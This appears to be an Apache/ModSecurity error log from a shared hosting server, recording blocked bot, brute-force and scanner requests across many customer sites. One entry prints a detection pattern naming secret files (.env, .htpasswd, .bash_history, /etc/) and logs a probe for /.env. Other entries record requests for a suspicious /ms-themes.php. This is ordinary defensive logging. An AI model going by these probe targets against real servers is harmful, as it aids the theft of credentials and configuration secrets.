[Tue May 26 19:22:16.421002 2026] [security2:error] [pid 37506:tid 37741] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWljwKctTPx5f8aOzkkoQAAAGk"]
[Tue May 26 19:22:16.590911 2026] [security2:error] [pid 37506:tid 37661] [client 103.104.20.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahWlkAKctTPx5f8aOzkktgAAABk"]
[Tue May 26 19:22:17.309906 2026] [security2:error] [pid 37506:tid 37729] [client 103.104.20.56:25798] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahWlkQKctTPx5f8aOzkkywAAAF0"]
[Tue May 26 19:22:17.734253 2026] [security2:error] [pid 37506:tid 37733] [client 66.249.64.174:45488] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWlkAKctTPx5f8aOzkktwAAAGE"], referer: https://doyecpa.com/prizes/29980844
[Tue May 26 19:22:18.476217 2026] [security2:error] [pid 37506:tid 37621] [remote 123.30.233.13:33354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlkgKctTPx5f8aOzkk4wAATXI"]
[Tue May 26 19:22:18.834601 2026] [security2:error] [pid 37506:tid 37724] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlkgKctTPx5f8aOzkk6QAAAFg"]
[Tue May 26 19:22:19.018770 2026] [security2:error] [pid 37506:tid 37604] [remote 123.30.233.13:33354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlkgKctTPx5f8aOzkk9AAAZmE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:22:20.087988 2026] [security2:error] [pid 37506:tid 37693] [client 102.164.188.174:4667] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWlkwKctTPx5f8aOzklEQAAOWQ"], referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=18&datepmonth=3&datepyear=2026
[Tue May 26 19:22:20.890992 2026] [security2:error] [pid 37506:tid 37698] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWllAKctTPx5f8aOzklIAAAAD4"]
[Tue May 26 19:22:22.985646 2026] [security2:error] [pid 37506:tid 37517] [remote 49.12.3.147:35146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWllgKctTPx5f8aOzklZQAAPQo"]
[Tue May 26 19:22:23.214619 2026] [security2:error] [pid 37506:tid 37760] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWllgKctTPx5f8aOzklYwAAAHw"]
[Tue May 26 19:22:24.074312 2026] [security2:error] [pid 37506:tid 37634] [remote 74.7.241.58:58664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWlmAKctTPx5f8aOzklhQAATH8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-includes
[Tue May 26 19:22:25.491447 2026] [security2:error] [pid 37506:tid 37746] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlmQKctTPx5f8aOzklnAAAAG4"]
[Tue May 26 19:22:26.990056 2026] [security2:error] [pid 37506:tid 37687] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlmgKctTPx5f8aOzklyAAAADM"]
[Tue May 26 19:22:27.644186 2026] [security2:error] [pid 37506:tid 37691] [client 167.88.165.11:44480] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "dprassurance.lk"] [uri "/"] [unique_id "ahWlmwKctTPx5f8aOzkl5wAAADc"]
[Tue May 26 19:22:27.646918 2026] [security2:error] [pid 37506:tid 37719] [client 167.88.165.11:44494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "dprassurance.lk"] [uri "/"] [unique_id "ahWlmwKctTPx5f8aOzkl6AAAAFM"]
[Tue May 26 19:22:30.146680 2026] [security2:error] [pid 37506:tid 37713] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlnQKctTPx5f8aOzkmIgAAAE0"]
[Tue May 26 19:22:32.539634 2026] [security2:error] [pid 37506:tid 37678] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWloAKctTPx5f8aOzkmYQAAACo"]
[Tue May 26 19:22:33.416598 2026] [security2:error] [pid 37506:tid 37650] [client 207.46.13.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "triviewsolutions.com"] [uri "/index.php"] [unique_id "ahWloAKctTPx5f8aOzkmegAAAA4"]
[Tue May 26 19:22:33.871893 2026] [autoindex:error] [pid 37506:tid 37732] [client 43.135.211.148:59752] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:22:34.442961 2026] [security2:error] [pid 37506:tid 37730] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlogKctTPx5f8aOzkmoAAAAF4"]
[Tue May 26 19:22:34.783326 2026] [security2:error] [pid 37506:tid 37649] [client 66.249.66.167:40294] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "tickerbell.tech"] [uri "/robots.txt"] [unique_id "ahWlogKctTPx5f8aOzkmtwAAAA0"]
[Tue May 26 19:22:34.882550 2026] [security2:error] [pid 37506:tid 37675] [client 185.191.171.5:11980] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWlogKctTPx5f8aOzkmvwAAACc"]
[Tue May 26 19:22:34.882679 2026] [security2:error] [pid 37506:tid 37675] [client 185.191.171.5:11980] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWlogKctTPx5f8aOzkmvwAAACc"]
[Tue May 26 19:22:35.496166 2026] [security2:error] [pid 37506:tid 37678] [client 188.166.88.201:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWlowKctTPx5f8aOzkm1AAAACo"], referer: http://srsglobalsoft.com/
[Tue May 26 19:22:36.786771 2026] [security2:error] [pid 37506:tid 37741] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlpAKctTPx5f8aOzkm-gAAAGk"]
[Tue May 26 19:22:36.981166 2026] [security2:error] [pid 37506:tid 37757] [client 68.234.41.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlpAKctTPx5f8aOzknCQAAAHk"], referer: https://www.anujtradingco.com/
[Tue May 26 19:22:36.988506 2026] [security2:error] [pid 37506:tid 37640] [client 158.173.3.175:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlpAKctTPx5f8aOzkm_QAAAAQ"]
[Tue May 26 19:22:37.560787 2026] [security2:error] [pid 37506:tid 37680] [client 114.119.132.183:61291] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahWlpQKctTPx5f8aOzknGQAAACw"], referer: http://newdental.com.co/?ucci/3995477656305639l14a/daedag215d.undeserver
[Tue May 26 19:22:38.400208 2026] [security2:error] [pid 37506:tid 37741] [client 68.234.41.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlpgKctTPx5f8aOzknOQAAAGk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1246022&moderation-hash=657e4c20e1b70b3707134c7fedbed133
[Tue May 26 19:22:38.477809 2026] [security2:error] [pid 37506:tid 37726] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlpgKctTPx5f8aOzknMwAAAFo"]
[Tue May 26 19:22:38.554515 2026] [security2:error] [pid 37506:tid 37725] [client 185.191.171.12:27382] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/list/"] [unique_id "ahWlpgKctTPx5f8aOzknQAAAAFk"]
[Tue May 26 19:22:38.554683 2026] [security2:error] [pid 37506:tid 37725] [client 185.191.171.12:27382] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/list/"] [unique_id "ahWlpgKctTPx5f8aOzknQAAAAFk"]
[Tue May 26 19:22:41.200104 2026] [security2:error] [pid 37506:tid 37695] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlqAKctTPx5f8aOzknfgAAADs"]
[Tue May 26 19:22:41.636733 2026] [security2:error] [pid 37506:tid 37760] [client 188.166.88.201:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWlqQKctTPx5f8aOzknlwAAAHw"], referer: https://srsglobalsoft.com/
[Tue May 26 19:22:42.567873 2026] [security2:error] [pid 37506:tid 37587] [remote 38.95.35.74:33416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlqgKctTPx5f8aOzknsgAAdlA"]
[Tue May 26 19:22:42.793768 2026] [security2:error] [pid 37506:tid 37610] [remote 38.95.35.74:33416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlqgKctTPx5f8aOzknwAAAUWc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:22:43.296617 2026] [security2:error] [pid 37506:tid 37562] [remote 213.171.208.62:49402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWlqwKctTPx5f8aOzkn0AAAPjc"]
[Tue May 26 19:22:43.435831 2026] [security2:error] [pid 37506:tid 37719] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlqwKctTPx5f8aOzknzAAAAFM"]
[Tue May 26 19:22:45.638139 2026] [security2:error] [pid 37506:tid 37652] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlrQKctTPx5f8aOzkoDQAAABA"]
[Tue May 26 19:22:45.934525 2026] [security2:error] [pid 37506:tid 37658] [client 104.28.196.55:38659] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cpanel.digentasmartsn.com"] [uri "/ms-themes.php"] [unique_id "ahWlrQKctTPx5f8aOzkoJAAAABY"]
[Tue May 26 19:22:45.948137 2026] [security2:error] [pid 37506:tid 37673] [client 104.28.196.55:38666] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "autodiscover.digentasmartsn.com"] [uri "/ms-themes.php"] [unique_id "ahWlrQKctTPx5f8aOzkoJgAAACU"]
[Tue May 26 19:22:46.160246 2026] [security2:error] [pid 37506:tid 37748] [client 92.222.104.210:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "stockmarketanalysis.in"] [uri "/robots.txt"] [unique_id "ahWlrgKctTPx5f8aOzkoLgAAAHA"]
[Tue May 26 19:22:46.160390 2026] [security2:error] [pid 37506:tid 37748] [client 92.222.104.210:0] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "stockmarketanalysis.in"] [uri "/robots.txt"] [unique_id "ahWlrgKctTPx5f8aOzkoLgAAAHA"]
[Tue May 26 19:22:47.304158 2026] [security2:error] [pid 37506:tid 37665] [client 176.65.139.229:17040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "me.moes-art.com"] [uri "/.env"] [unique_id "ahWlrwKctTPx5f8aOzkoUQAAAB0"]
[Tue May 26 19:22:47.450073 2026] [security2:error] [pid 37506:tid 37743] [client 89.221.204.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlrwKctTPx5f8aOzkoWgAAAGs"], referer: https://www.anujtradingco.com/
[Tue May 26 19:22:47.508998 2026] [security2:error] [pid 37506:tid 37733] [client 54.39.210.86:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "stockmarketanalysis.in"] [uri "/"] [unique_id "ahWlrwKctTPx5f8aOzkoXAAAAGE"]
[Tue May 26 19:22:47.509130 2026] [security2:error] [pid 37506:tid 37733] [client 54.39.210.86:0] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "stockmarketanalysis.in"] [uri "/"] [unique_id "ahWlrwKctTPx5f8aOzkoXAAAAGE"]
[Tue May 26 19:22:48.202469 2026] [security2:error] [pid 37506:tid 37699] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlrwKctTPx5f8aOzkoawAAAD8"]
[Tue May 26 19:22:48.922332 2026] [security2:error] [pid 37506:tid 37700] [client 89.221.204.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlsAKctTPx5f8aOzkoigAAAEA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1440498&moderation-hash=735983836e1e6bd28c4a4e81e576fedc
[Tue May 26 19:22:49.097753 2026] [security2:error] [pid 37506:tid 37661] [client 104.28.196.55:9807] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cpcontacts.digentasmartsn.com"] [uri "/ms-themes.php"] [unique_id "ahWlsQKctTPx5f8aOzkolAAAABk"]
[Tue May 26 19:22:50.102473 2026] [security2:error] [pid 37506:tid 37513] [remote 173.212.233.81:60734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWlsQKctTPx5f8aOzkopwAAWQY"]
[Tue May 26 19:22:50.337356 2026] [security2:error] [pid 37506:tid 37684] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlsQKctTPx5f8aOzkoqgAAADA"]
[Tue May 26 19:22:50.665776 2026] [security2:error] [pid 37506:tid 37615] [remote 173.212.233.81:60734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.233.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWlsgKctTPx5f8aOzkowgAAAGw"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:22:51.180680 2026] [security2:error] [pid 37506:tid 37626] [remote 72.167.150.128:44248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWlswKctTPx5f8aOzkoxgAAEHc"]
[Tue May 26 19:22:51.479357 2026] [security2:error] [pid 37506:tid 37613] [remote 72.167.150.128:44248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWlswKctTPx5f8aOzko2gAAcGo"], referer: https://tea.canopykaapi.com/wp-login.php
[Tue May 26 19:22:52.472518 2026] [security2:error] [pid 37506:tid 37579] [remote 194.163.139.224:49636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWltAKctTPx5f8aOzko9AAAMUg"]
[Tue May 26 19:22:52.500376 2026] [security2:error] [pid 37506:tid 37688] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWltAKctTPx5f8aOzko6gAAADQ"]
[Tue May 26 19:22:52.706059 2026] [security2:error] [pid 37506:tid 37627] [remote 194.163.139.224:49636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWltAKctTPx5f8aOzkpAAAALHg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:22:52.939235 2026] [security2:error] [pid 37506:tid 37693] [client 64.226.63.186:10450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.63.226.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/xmlrpc.php"] [unique_id "ahWltAKctTPx5f8aOzko-gAAADk"]
[Tue May 26 19:22:52.939459 2026] [security2:error] [pid 37506:tid 37693] [client 64.226.63.186:10450] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "samayikprasanga.in"] [uri "/xmlrpc.php"] [unique_id "ahWltAKctTPx5f8aOzko-gAAADk"]
[Tue May 26 19:22:54.846713 2026] [fcgid:warn] [pid 37506:tid 37648] (70014)End of file found: [client 199.45.154.141:55704] mod_fcgid: can't get data from http client
